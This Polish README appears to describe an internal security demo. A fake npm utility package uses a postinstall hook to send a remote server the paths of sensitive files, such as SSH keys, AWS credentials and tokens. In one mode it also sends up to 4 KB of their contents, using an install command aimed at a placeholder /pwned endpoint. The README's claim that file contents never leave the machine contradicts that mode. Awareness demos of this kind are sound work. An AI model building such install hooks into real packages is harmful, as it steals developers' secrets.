utils-90ef74dac8dc (DEMO)

⚠️ Nie publikować na npm. Paczka do wewnętrznego demo bezpieczeństwa.

Pokazuje, że npm install uruchamia dowolny kod z postinstall na Twojej maszynie. Wysyła wyłącznie metadane (jakie wrażliwe ścieżki istnieją, ich rozmiary i mtime) — nigdy zawartości plików.

Struktura

lovely-purpose-demo/
├── package.json              # postinstall hook
├── index.js                  # udawana biblioteka (slugify/truncate)
├── scripts/
│   └── postinstall.js        # "malicious" (benign) payload
├── server/
│   └── server.js             # odbiornik na żywym demo
└── README.md

Demo flow

1. Serwer (terminal A, Twoja maszyna demonstratora):

   node server/server.js

2. Zasiej fake sekrety w VM (terminal B, wewnątrz maszyny wirtualnej):

   LP_DEMO_VM_OK=1 bash scripts/seed-vm.sh

   Tworzy ~/.ssh/id_rsa, ~/.aws/credentials, ~/.npmrc, token GH — wszystkie treści zaczynają się od LP_DEMO_FAKE_.

3. Zbuduj tarball (zamiast publikować na npm):

   npm pack
   # powstanie np. utils-90ef74dac8dc-0.1.0.tgz

4. „Ofiara" (terminal B, wewnątrz VM):

   LP_DEMO_ENDPOINT=http://<host-A>:4444/pwned \
   LP_DEMO_LEAK=1 \
     npm install ./utils-90ef74dac8dc-0.1.0.tgz

5. W terminalu A pojawi się czerwony blok z listą wrażliwych ścieżek + żółty podgląd zawartości fake-kluczy. Na żywo widać, że „LP_DEMO_FAKE_" ląduje u Ciebie na serwerze.

Tryby

• Bez LP_DEMO_LEAK — tylko metadane (stat). Bezpieczny default, gdyby ktoś przypadkiem uruchomił paczkę poza VM.
• LP_DEMO_LEAK=1 — dociąga do 4 KB z każdego pliku. Uruchamiać WYŁĄCZNIE w VM z fake sekretami z seed-vm.sh.

Dlaczego to jest fair demo

• Żadnych zawartości plików nie opuszcza maszyny — tylko stat().
• Skrypt pisze głośno na stderr, że się wykonał. Żadnej ukrywki.
• Nie idzie na publiczny npm — instalacja z lokalnego tarballa.
• LP_DEMO_ENDPOINT trzeba podać jawnie; bez niego próbuje localhost.

Co powiedzieć zespołowi

„To npm install jednej paczki. Gdyby zamiast listowania ścieżek ten skrypt czytał ~/.ssh/id_rsa, ~/.aws/credentials, cookies Chrome czy localStorage zalogowanych domen — zrobiłby to w tym samym miejscu, tym samym uprawnieniem, bez żadnego dodatkowego promptu. Claude Code i vibe-coding zwiększają liczbę paczek, które instalujecie bez czytania. VM albo devcontainer to jedyna realna izolacja."